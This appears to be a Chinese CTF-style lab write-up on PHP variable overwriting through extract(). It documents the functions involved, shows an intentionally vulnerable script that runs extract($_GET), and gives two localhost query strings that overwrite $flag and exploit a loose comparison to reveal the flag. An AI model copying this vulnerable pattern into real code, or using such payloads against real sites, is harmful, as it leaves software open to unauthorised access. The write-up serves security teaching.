前置知识

extract() 函数从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
第二个参数 type 用于指定当某个变量已经存在,而数组中又有同名元素时,extract() 函数如何对待这样的冲突。
该函数返回成功导入到符号表中的变量数目。
语法:
extract(array,extract_rules,prefix)

参数 描述
array 必需。规定要使用的数组。
extract_rules 可选。extract() 函数将检查每个键名是否为合法的变量名,同时也检查和符号表中已存在的变量名是否冲突。对不合法和冲突的键名的处理将根据此参数决定。
可能的值:
- EXTROVERWRITE - 默认。如果有冲突,则覆盖已有的变量。
- EXTR_SKIP - 如果有冲突,不覆盖已有的变量。
- EXTR_PREFIX_SAME - 如果有冲突,在变量名前加上前缀 _prefix
- EXTRPREFIX_ALL - 给所有变量名加上前缀 _prefix
- EXTRPREFIX_INVALID - 仅在不合法或数字变量名前加上前缀 _prefix
- EXTR_IF_EXISTS - 仅在当前符号表中已有同名变量时,覆盖它们的值。其它的都不处理。
- EXTR_PREFIX_IF_EXISTS - 仅在当前符号表中已有同名变量时,建立附加了前缀的变量名,其它的都不处理。
- EXTR_REFS - 将变量作为引用提取。导入的变量仍然引用了数组参数的值。
prefix 可选。请注意 prefix 仅在 extract_type 的值是 EXTR_PREFIX_SAME,EXTR_PREFIX_ALL,EXTR_PREFIX_INVALID 或 EXTR_PREFIX_IF_EXISTS 时需要。如果附加了前缀后的结果不是合法的变量名,将不会导入到符号表中。
前缀和数组键名之间会自动加上一个下划线。

函数运行demo
2022-03-23_221451.png
isset() 函数用于检测变量是否已设置并且非 NULL。如果指定变量存在且不为 NULL,则返回 TRUE,否则返回 FALSE。
trim() 函数移除字符串两侧的空白字符或其他预定义字符。
file_get_contents() 把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。
语法
file_get_contents(path,include_path,context,start,max_length)

参数 描述
path 必需。规定要读取的文件。
include_path 可选。如果您还想在 include_path(在 php.ini 中)中搜索文件的话,请设置该参数为 ‘1’。
context 可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL,则忽略。
start 可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 中新增的。
max_length 可选。规定读取的字节数。该参数是 PHP 5.1 中新增的。

当file_get_contents读取内容失败时返回false

漏洞测试代码

  1. <?php
  3. $flag='xxx';
  4. extract($_GET);
  5.  if(isset($shiyan))
  6.  { 
  7.     $content=file_get_contents($flag);
  8.     if($shiyan==$content)
  9.     { 
  10.         echo'ctf{xxx}'; 
  11.     }
  12.    else
  13.    { 
  14.     echo'Oh.no';
  15.    } 
  16.    }
  18. ?>

漏洞复现

  1. 发生以下任意请求,均可绕过限制拿到flag
    1. http://127.0.0.1/php/01%20extract%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96.php?shiyan=0&flag=123
    2. 或者
    3. http://127.0.0.1/php/01%20extract%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96.php?shiyan=&flag=123
    2022-03-23_225712.png

    漏洞分析

    extract() 函数默认模式下,如果有变量冲突,则覆盖已有的变量。当我们传入shiyan=0&flag=123这两个参数时,经过extract()函数处理变成了两个变量$shiyan = 0 ,$flag = 123。而$flag变量因为是在extract()函数之前被定义,所以经过extract()函数生成的同名变量$flag覆盖掉之前定义的$flag变量值为123,之后进入if条件判断,isset($shiyan)条件为真,进入对应的语句块。之后$flag变量被带入到file_get_contents函数中,但该值123不是为有效的文件名,故file_get_contents函数读取内容失败返回false并赋值给$content。接着进入if($shiyan==$content)条件判断,0==false条件成立,进入语句块拿到flag。

运行